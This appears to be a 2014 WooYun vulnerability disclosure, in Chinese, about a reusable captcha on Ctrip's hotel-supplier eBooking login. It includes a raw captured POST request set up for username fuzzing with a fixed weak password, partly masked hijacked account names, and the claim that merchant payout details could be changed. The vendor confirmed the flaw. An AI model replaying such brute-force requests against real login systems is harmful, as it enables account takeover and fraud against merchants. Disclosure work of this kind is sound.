当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-075083

漏洞标题:携程某管理系统存在缺陷导致大量商家密码泄漏(影响商家资金安全)

相关厂商:携程旅行网

漏洞作者: niliu

提交时间:2014-09-04 21:38

修复时间:2014-10-24 21:44

公开时间:2014-10-24 21:44

漏洞类型:设计缺陷/逻辑错误

危害等级:高

自评Rank:15

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2014-09-04: 该漏洞正等待厂商内部评估
2014-09-04: 厂商已经确认,与白帽子共同解决该漏洞中,漏洞信息仅向厂商公开
2014-09-24: 细节向核心白帽子及相关领域专家公开
2014-10-04: 细节向普通白帽子公开
2014-10-14: 细节向实习白帽子公开
2014-10-24: 细节向公众公开

简要描述:

涉及到携程商家账号,信息泄漏,后台各种权限,以及商家收入金额,银行卡号等等。

详细说明:

问题出现在携程酒店管理系统
页面地址:https://ebooking.ctrip.com/hotel-supplier-ebookinglogin/EbookingLogin.aspx

image.jpg


可以看到是有验证码限制的,登录错误后验证码也会刷新。
但是不知道是不是程序员偷懒,这里直接填写好正确的验证码,设置好代理,提交时抓包,验证码竟然可以重复使用。
导致可以对商家账号进行fuzz
以下是抓包数据

POST /hotel-supplier-ebookinglogin/EbookingLogin.aspx HTTP/1.1
Host: ebooking.ctrip.com
Connection: keep-alive
Content-Length: 2397
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: https://ebooking.ctrip.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Referer: https://ebooking.ctrip.com/hotel-supplier-ebookinglogin/EbookingLogin.aspx
Accept-Encoding: gzip,deflate,sdch
Accept-Language: zh-CN,zh;q=0.8,en;q=0.6
Cookie: 
__VIEWSTATE=%2FwEPDwUKMTI3Nzk0MjE4Ng8WBB4PVXNpbmdOZXdWZXJzaW9uZx4GYmFubmVyBV08ZGl2IGNsYXNzPSJsb2dpbl9taWRkbGUiIHN0eWxlPSJiYWNrZ3JvdW5kOnVybChpbWFnZXMvYmFubmVyMi5qcGcpIG5vLXJlcGVhdCBjZW50ZXIgY2VudGVyIj4WAmYPZBYUZg8WAh4HVmlzaWJsZWgWFGYPFgIeCWlubmVyaHRtbAUM6ZuG5Zui5Luj5Y%2B3ZAICDxYCHwMFDOmFkuW6l%2BS7o%2BWPt2QCBA8WAh8DBQnnlKjmiLflkI1kAgYPFgIfAwUG5a%2BG56CBZAIIDxYCHgVzdHlsZQUNZGlzcGxheTpub25lOxYCAgEPFgIfAwUJ6aqM6K%2BB56CBZAIJDxYCHwQFDWRpc3BsYXk6bm9uZTtkAgsPDxYCHwJoZGQCDA8PFgIeBFRleHQFBueZu%2BW9lWRkAg0PDxYCHwUFKuW3suWNh%2Be6p%2BS4uuaWsOi0puWPt%2B%2B8n%2BWJjeW%2BgOaWsOeJiOeZu%2BW9lWRkAg4PFgIfAwUS55Sz6K%2B36YWS5bqX5Yqg55ufZAIBDxYCHwJnFhJmDxYCHwMFCeeUqOaIt%2BWQjWQCAg8WAh8CaGQCAw8WAh8DBQblr4bnoIFkAgUPFgIfAmcWAgIBDw8WAh8FBQ%2Flr4bnoIHkuI3mraPnoa5kZAIGDxYCHwQFCWRpc3BsYXk6OxYEAgEPFgIfAwUJ6aqM6K%2BB56CBZAIHDxYCHwJoFgICAQ8PFgIfBQUe6K%2B36L6T5YWl5q2j56Gu55qE6aqM6K%2BB56CB77yBZGQCBw8WAh8EBQ1kaXNwbGF5Om5vbmU7FgICBw8WAh8CaGQCCQ8PFgIfBQUG55m75b2VZGQCCg8PFgIfBQUS6L%2BU5Zue5pen54mI55m75b2VZGQCCw8WAh8DBRLnlLPor7fphZLlupfliqDnm59kAgIPZBYEAgEPFgIfAwUM6YeN6KaB6YCa55%2BlZAIDDxYCHgtfIUl0ZW1Db3VudAIDFgZmD2QWAmYPFQQdVGVuZGVuY3lWaWV3TG9naW4uYXNweD9UaWQ9OTEACTIwMTQtOC0yOJ0BPHNwYW4gc3R5bGU9J2NvbG9yOiNGRjAwMDA7Zm9udC13ZWlnaHQ6Ym9sZDsnPuWuouagiOiAgeadv%2BeahOemj%2Bmfs%2BKAlOKAlOWuouagiOS%2FoeaBr%2BW3sue7j%2BWPr%2BS7pee7tOaKpOWVpu%2B8gTwvc3Bhbj4mbmJzcCZuYnNwPGltZyBzcmM9J2ltYWdlcy9uZXdpY28uZ2lmJyAvPmQCAQ9kFgJmDxUEHVRlbmRlbmN5Vmlld0xvZ2luLmFzcHg%2FVGlkPTkwAAkyMDE0LTgtMjVFPHNwYW4gc3R5bGU9J2NvbG9yOiMwMDAwRkY7Jz7lhbPkuo7kvb%2FnlKjigJzmlK%2Fku5jlrp3igJ3msYfmrL48L3NwYW4%2BZAICD2QWAmYPFQQdVGVuZGVuY3lWaWV3TG9naW4uYXNweD9UaWQ9ODAACTIwMTQtOC0xMks8c3BhbiBzdHlsZT0nY29sb3I6IzAwMDAwMDsnPuaJi%2BacuuWuouaIt%2Berr%2BaVmeeoi%2BS4ie%2B8muiuouWNleWkhOeQhjwvc3Bhbj5kAgUPFgIfAmhkAgYPFgIfAmhkAgcPFgIfAmhkAggPFgIfAwUU5YW25LuWZUJvb2tpbmflhaXlj6NkAgkPFgIfAmdkAgoPFgIeA3NyYwUZaW1hZ2VzL3FyY29kZV9hbmRyb2lkLnBuZ2QCCw8WAh8HBRlpbWFnZXMvcXJjb2RlX2FuZHJvaWQucG5nZBgBBR5fX0NvbnRyb2xzUmVxdWlyZVBvc3RCYWNrS2V5X18WAgUPTmV3SW1hZ2VCdXR0b240BQ9OZXdJbWFnZUJ1dHRvbjYLQ9bUlUqGmCZPIHOCYzGDocSixZMn1N%2FIIq%2BbjpesNg%3D%3D&__EVENTVALIDATION=%2FwEWCwLNioPRAwKl1bKzCQK1qbSRCwKr%2Fr6OBgL6m%2BvyCwLv4pXdBwKw7qYdAu7srpMCAq%2BUoRACiOry9QcCy5Sghw4VtachTr%2FwIMMVptpeeXB8f7ZxtOw%2BCyLmiFphRWEfKg%3D%3D&txtUserName=§admin§&txtPassword=123456&txtVerifycodeNew=4359&txtVerifycodeNew6=&txtAuthCodeNew=&submitNew=%E7%99%BB%E5%BD%95&AjaxAccountSecurityStatus=Image4


账号密码都为明文,我随便找个用户名字典进行测试下。

042108419413eb82f76aa15dc19e894fd773efd8.jpg


返回包长度为921的 都是可以登录的。
贴出部分账号,密码为123456。当然也可以用其他密码进行测试。



mask 区域


*****^^12*****
*****^123*****
*****^123*****
*****1234*****
*****^^12*****
*****1234*****
*****1234*****
*****1234*****
*****1234*****
*****1234*****
*****^123*****
*****^^12*****
*****^^12*****
*****^^12*****
*****^^123*****
*****^123*****
*****^^12*****
*****1234*****
*****^^12*****
*****^^12*****


登录看看情况。

mask 区域 
*****a*****


04211909c7d9c54336987c4716a5223b6075b98c.jpg


04211920efec54b857413fd00364189b5fb9b73f.jpg


可下载各种账单,修改房间信息,价格等等

image.jpg


04212032ef83dad6488e81015c3e0c2a5978ab87.jpg


mask 区域 
*****a*****


image.jpg


mask 区域 
*****ng*****


04212838fa1ca6871b9fffe42cb8bb0949db0907.jpg


发现可以修改商家收款账号...YY一下而已...

漏洞证明:

综上所述,不过多截图。

修复方案:

接口问题直接影响用户数据及利益,商家的更严重。
验证码虽然加了,但是可以重复使用。
对验证码使用次数作限制!

版权声明:转载请注明来源 niliu@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2014-09-04 21:42

厂商回复:

漏洞已确认真实存在,并已安排人处理。

最新状态:

暂无

漏洞评价:

评论